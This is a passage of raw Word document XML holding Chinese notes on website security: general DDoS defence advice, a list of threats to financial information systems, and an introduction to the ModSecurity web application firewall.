          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>目前是不可能的，但通过适当的措施抵御</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>90%</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:hyperlink r:id="rId270" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>DDOS</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>攻击</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是可以做到的，基于攻击和防御都有成本开销的缘故，若通过适当的办法增强了抵御</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的能力，也就意味着加大了攻击者的攻击成本，那么绝大多数攻击者将无法继续下去而放弃，也就相当于成功的抵御了</w:t>
      </w:r>
      <w:hyperlink r:id="rId271" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>DDOS</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>攻击</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。以下为笔者多年以来抵御</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的经验和建议，和大家分享！</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96286" w:rsidRPr="00F41A4C" w:rsidRDefault="007479C6" w:rsidP="00E96286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ddos</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E96286" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>采用高性能的网络设备</w:t>
      </w:r>
      <w:r w:rsidR="00E96286" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00794EC0" w:rsidRPr="00F41A4C" w:rsidRDefault="00794EC0" w:rsidP="00794EC0">
      <w:pPr>
        <w:ind w:firstLineChars="550" w:firstLine="1155"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器补丁打好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96286" w:rsidRDefault="00E96286" w:rsidP="00E96286">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009127A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009127A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>把网</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>站做成静态页面</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1ECB" w:rsidRPr="00F41A4C" w:rsidRDefault="008C1ECB" w:rsidP="004132D7">
      <w:pPr>
        <w:ind w:left="420" w:firstLineChars="350" w:firstLine="735"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007479C6" w:rsidRPr="00F41A4C" w:rsidRDefault="007479C6" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007479C6" w:rsidRPr="00F41A4C" w:rsidRDefault="007479C6" w:rsidP="005D4233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00126D1A" w:rsidRPr="00F41A4C" w:rsidRDefault="00126D1A" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00343957" w:rsidRPr="00F41A4C" w:rsidRDefault="00895CE5" w:rsidP="00343957">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00343957" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343957" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>金融信息安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126D1A" w:rsidRPr="00F41A4C" w:rsidRDefault="00D02FDC" w:rsidP="00351EDD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>信息安全是金融行业特别关注的问题。</w:t>
      </w:r>
      <w:r w:rsidR="00351EDD" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>面临的问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351EDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00351EDD" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>非法访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351EDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00351EDD" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>失密和窃密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351EDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00351EDD" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>信息篡改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351EDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00351EDD" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>黑客入侵</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351EDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00351EDD" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>假冒和伪造</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5087" w:rsidRPr="00F41A4C" w:rsidRDefault="00FF5087" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>拒绝服务</w:t>
      </w:r>
      <w:r w:rsidR="00D36597" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>攻击，</w:t>
      </w:r>
      <w:r w:rsidR="00D36597" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ddos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785BA9" w:rsidRPr="00F41A4C" w:rsidRDefault="00785BA9" w:rsidP="00785BA9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 </w:t>
      </w:r>
      <w:r w:rsidR="0038066E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>网站安全架构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089018E" w:rsidRPr="00F41A4C" w:rsidRDefault="0089018E" w:rsidP="0089018E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>应用防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089018E" w:rsidRPr="00F41A4C" w:rsidRDefault="00AE3DB1" w:rsidP="0089018E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是一个开源的</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>应用防火墙，探测攻击并保护</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>应用程序，既可以嵌入到</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>应用服务器中，也可以作为一个独立的应用程序启</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>动。</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>最早只是</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的一个模块，现在已经有</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>多个版本，并支持</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidR="0089018E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089018E" w:rsidRPr="00F41A4C" w:rsidRDefault="0089018E" w:rsidP="0089018E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="241" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>        ModSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>采用处理逻辑与攻击规则集合分离的架构模式。处理逻辑（执行引擎）负载请求和相应的拦截过滤，规则加载执行等功能。而攻击规则集合</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
